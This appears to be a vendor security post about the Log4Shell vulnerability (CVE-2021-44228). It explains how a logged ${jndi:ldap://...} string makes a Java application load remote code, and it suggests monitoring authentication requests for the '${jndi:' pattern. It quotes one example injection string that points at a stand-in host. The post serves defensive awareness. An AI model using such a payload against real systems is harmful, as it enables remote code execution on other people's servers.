Monitoring for Log4j2 Exploits with Silverfort

Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The security community recently discovered a new Log4jl vulnerability (CVE-2021-44228) that allows a remote attacker who controls log fields in some applications, to exploit Log4j for remotely executing code on a target application. For example, an attacker can cause an application to log a field that contains a string in the form ${jndi:<malicious>}. If the attacker causes the application to log a string in the form ${jndi:<ldap://example.com/a>}, the application will reach out to the url ldap://example.com/a to load an object. If the hacker controls example.com, the attacker can use this vulnerability to load an object of their choice to the application’s memory.

This vulnerability has been compared to HeartBleed and ShellShock due to its wide impact. Most applications that use Java use log4j2 for logging, so a wide array of applications and systems in your environment may be impacted. There are multiple reports of mass usage of this vulnerability in the wild as well with a rapidly growing number of exploit variants; more than 60 of which appeared within 24 hours of the vulnerability’s initial disclosure.

Silverfort has reviewed its code and found no vulnerable usage of log4j2 by the product.

According to CloudFlare, the vulnerability is already being exploited in the wild, and attackers often use the username field to exploit this vulnerability. This makes sense because the username field is often logged for unsuccessful authentication requests.

Silverfort monitors all authentication requests in the environment and can be used to audit for these Log4Shell exploits by reporting on the use of the “${jndi:” string in authentication requests. Security teams are advised to update their software as soon as possible as well as to check if their vulnerable servers might have been compromised prior to the patch.

Questions? We’re always here for you. test